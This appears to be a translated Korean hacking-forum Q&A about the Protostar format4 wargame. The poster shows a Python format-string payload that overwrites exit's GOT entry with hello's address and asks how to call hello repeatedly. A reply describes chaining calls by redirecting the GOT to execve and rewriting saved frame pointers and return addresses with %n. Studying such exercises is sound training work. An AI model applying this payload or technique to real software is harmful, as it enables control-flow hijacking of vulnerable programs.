System Hacking

   tkakr7458
   format string bug + got overwrite

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1864


Hmm.. I can't upload a picture, so this is hard to explain ㅠㅠ

https://exploit-exercises.com/protostar/format4/

The address above is the source.

I'm trying to overwrite exit with hello.

hello = 0x080484b4 and
exit@got = 0x8049718.

The format offset is 4. (With "AAAA %x%x%x%x" it shows up in the 4th position)

(python -c 'print "\x18\x97\x04\x08"+"%134513840x"+"%4$n"')
                   exit@got            hello as an integer - 4

I understand that doing it this way performs the overwrite, but I don't know how to call hello repeatedly. Please help ㅠㅠ

  Hit : 2403     Date : 2017/04/19 08:28



    
해쿨러 The intent of this problem itself is to call hello only once. Since hello contains _exit, the program will terminate after going to hello anyway, but in a situation where it didn't, the way to call it repeatedly is to overwrite the stack.
Overwrite the exit function's GOT with a function that proceeds normally even when it receives the argument 1, for example execve (execve does not terminate the program even if its arguments are wrong),
then find the pointer to the sfp. That is, since the vuln function's sfp points to the main function's sfp, if you overwrite an address onto the vuln function's sfp with %n and then overwrite the payload from the main function's ret onward using the fsb, you can do call chaining with an fsb as well.
2017/04/20
해쿨러 http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20
tkakr7458 Thank you. ㅠㅠ 2017/04/20